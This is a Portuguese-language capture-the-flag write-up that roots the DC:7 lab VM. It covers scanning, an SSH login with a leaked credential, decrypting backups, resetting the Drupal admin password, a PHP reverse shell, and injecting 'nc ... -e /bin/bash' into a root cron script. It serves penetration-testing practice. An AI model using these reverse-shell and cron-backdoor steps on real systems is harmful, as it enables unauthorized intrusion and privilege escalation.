Estou aqui novamente para apresentar mais uma boot2root VM para vocês. Dessa vez lhes trago DC:7.
Essa máquina foi lançada em 31 de Agosto de 2019 e o download pode ser realizado em DC:7.
Caso tenham perdido o writeup da DC:6, é só acessar AQUI!
Sem mais delongas, vamos ao que interessa!
Como sempre começamos com o host discovery:
$netdiscover -i eth1 -r 192.168.56.0/24 Currently scanning: Finished! | Screen View: Unique Hosts 4 Captured ARP Req/Rep packets, from 3 hosts. Total size: 240 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname -----------------------------------------------------------------------------192.168.56.1 0a:00:27:00:00:14 1 60 Unknown vendor192.168.56.100 08:00:27:10:55:06 2 120 PCS Systemtechnik GmbH192.168.56.107 08:00:27:42:8e:99 1 60 PCS Systemtechnik GmbH
Agora que já identificamos nosso alvo, podemos descobrir quais são os serviços existentes nesse host:
$nmap -sS -sV -sC -Pn -p- 192.168.56.107 Nmap scan report for 192.168.56.107 Host is up (0.00011s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0) | ssh-hostkey: | 2048 d0:02:e9:c7:5d:95:32:ab:10:99:89:84:34:3d:1e:f9 (RSA) | 256 d0:d6:40:35:a7:34:a9:0a:79:34:ee:a9:6a:dd:f4:8f (ECDSA) |_ 256 a8:55:d5:76:93:ed:4f:6f:f1:f7:a1:84:2f:af:bb:e1 (ED25519) 80/tcp open http Apache httpd 2.4.25 ((Debian)) |_http-generator: Drupal 8 (https://www.drupal.org) | http-robots.txt: 22 disallowed entries (15 shown) | /core/ /profiles/ /README.txt /web.config /admin/ | /comment/reply/ /filter/tips /node/add/ /search/ /user/register/ | /user/password/ /user/login/ /user/logout/ /index.php/admin/ |_/index.php/comment/reply/ |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Welcome to DC-7 | D7 MAC Address: 08:00:27:42:8E:99 (Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 10.50 seconds
Temos apenas os serviços SSH e HTTP disponíveis no alvo. Com isso, vamos começar nossa análise pela aplicação web.
Conseguimos identificar que trata-se de um drupal. Além disso, a página inicial menciona uma conta do twitter.
Acessando o github informado na perfil do twitter, conseguimos identificar uma credencial no arquivo config.php.
E utilizando essa credencial, conseguimos logar via ssh.
$ssh dc7user@192.168.56.107 dc7user@192.168.56.107's password: Linux dc-7 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u5 (2019-08-11) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. You have new mail. Last login: Fri Aug 30 03:10:09 2019 from 192.168.0.100 dc7user@dc-7:~$
Hora de buscar uma maneira de escalar privilégio.
Identificamos que existe uma rotina que faz o dump da base e criptografa utilizando o GnuPG.
Como podemos ver, temos acesso de leitura no script de backup. Entretando, apenas o usuário root e o grupo www-data possuem acesso de escrita.
$ls -l /opt/scripts/backups.sh -rwxrwxr-x 1 root www-data 520 Aug 29 2019 /opt/scripts/backups.sh dc7user@dc-7:~$
Vamos verificar qual é a mágica do script.
dc7user@dc-7:/opt/scripts$ cat backups.sh #!/bin/bash rm /home/dc7user/backups/* cd /var/www/html/ drush sql-dump --result-file=/home/dc7user/backups/website.sql cd .. tar -czf /home/dc7user/backups/website.tar.gz html/ gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz chown dc7user:dc7user /home/dc7user/backups/* rm /home/dc7user/backups/website.sql rm /home/dc7user/backups/website.tar.gz dc7user@dc-7:/opt/scripts$
Como trata-se de criptografia simétrica, podemos utilizar a mesma chave para descriptografar o arquivo e ter acesso ao dump da base.
dc7user@dc-7:~/backups$ gpg -d website.sql.gpg > ~/backup.sql gpg: AES256 encrypted data gpg: encrypted with 1 passphrase
Sabendo a versão do drupal
c7user@dc-7:~$ grep " VERSION " /var/www/html/core/lib/Drupal.php const VERSION = '8.7.6';
Fica fácil saber em qual tabela procurar os usuários existentes.
dc7user@dc-7:~$ grep users_field_data backup.sql ... INSERT INTO `users_field_data` VALUES (0,'en','en',NULL,'',NULL,NULL,'',0,1567054076,1567054076,0,0,NULL,1), (1,'en','en',NULL,'admin','$S$Ead.KmIcT/yfKC.1H53aDPJasaD7o.ioEGiaPy1lLyXXAJC/Qi4F','admin@example.com','Australia/Melbourne',1,1567054076,1567054076,1567098850,1567098643,'admin@example.com',1), (2,'en','en','en','dc7user','$S$EKe0kuKQvFhgFnEYMpq.mRtbl/TQ5FmEjCDxbu0HIHaO0/U.YFjI','dc7user@blah.com','Australia/Brisbane',1,1567057938,1567057938,0,0,'dc7user@blah.com',1);
Notamos que temos o drush na máquina (vide script de backup), logo podemos trocar a senha do usuário admin.
dc7user@dc-7:/var/www/html$ drush user-password admin --password="lcesteves" Changed password for admin
Agora que trocamos a senha, podemos logar no drupal.
Como o módulo PHP FILTER não está instalado, teremos que fazer a instalação manual.
Após o download, a instalação foi feita com sucesso.
já conseguimos visualizar o módulo disponível e instalado.
Precisamos agora apenas ir em Content > + Add Content > Basic Page e adicionar um reverse shell em php.
Após alterar o Text format para PHP code e clicar em preview, a conexão reversa é estabelecida.
root@kali:~# nc -nvlp 443 listening on [any] 443 ... connect to [192.168.56.102] from (UNKNOWN) [192.168.56.107] 33716 Linux dc-7 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u5 (2019-08-11) x86_64 GNU/Linux 04:37:55 up 36 min, 1 user, load average: 0.26, 0.17, 0.07 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT dc7user pts/0 192.168.56.102 04:03 9:39 0.05s 0.05s -bash uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ python -c 'import pty;pty.spawn("/bin/bash")'; www-data@dc-7:/$ ^Z [1]+ Stopped nc -nvlp 443 root@kali:~# stty raw -echo root@kali:~# nc -nvlp 443 www-data@dc-7:/$ stty rows 33 cols 112 www-data@dc-7:/$ export TERM=screen www-data@dc-7:/$ export SHELL=/bin/bash www-data@dc-7:/$
Estamos novamente com acesso a máquina, porém agora com privilegio do usuário www-data.
Você lembra que apenas o usuário root e www-data tinha acesso para editar o script de backup? Fim do jogo caso o script esteja sendo executado via cron com o usuário root.
Podemos validar utilizando o pspy64s.
Pefeito! Agora basta adicionarmos um comando no script para fechar a conexão reversa.
www-data@dc-7:/tmp$ cat /opt/scripts/backups.sh #!/bin/bash nc 192.168.56.102 4444 -e /bin/bash rm /home/dc7user/backups/* cd /var/www/html/ drush sql-dump --result-file=/home/dc7user/backups/website.sql cd .. tar -czf /home/dc7user/backups/website.tar.gz html/ gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz chown dc7user:dc7user /home/dc7user/backups/* rm /home/dc7user/backups/website.sql rm /home/dc7user/backups/website.tar.gz www-data@dc-7:/tmp$
E aguardar o script ser executado.
root@kali:~# nc -nlvp 4444 listening on [any] 4444 ... connect to [192.168.56.102] from (UNKNOWN) [192.168.56.107] 40218 python -c 'import pty;pty.spawn("/bin/bash")'; root@dc-7:~# ls -l ls -l total 4 -rw-r--r-- 1 root root 1079 Aug 30 2019 theflag.txt root@dc-7:~# cat theflag.txt cat theflag.txt 888 888 888 888 8888888b. 888 888 888 888 888 o 888 888 888 888 "Y88b 888 888 888 888 888 d8b 888 888 888 888 888 888 888 888 888 888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888 888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888 88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P 8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " " 888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888 Congratulations!!! Hope you enjoyed DC-7. Just wanted to send a big thanks out there to all those who have provided feedback, and all those who have taken the time to complete these little challenges. I'm sending out an especially big thanks to: @4nqr34z @D4mianWayne @0xmzfr @theart42 If you enjoyed this CTF, send me a tweet via @DCAU7. root@dc-7:~#
Referências:
https://www.drupal.org/docs/8/understanding-drupal-8/understanding-drupal-version-numbers/which-version-of-drupal-am-i
https://drushcommands.com/drush-8x/user/user-password/
https://www.sevenlayers.com/index.php/164-drupal-to-reverse-shell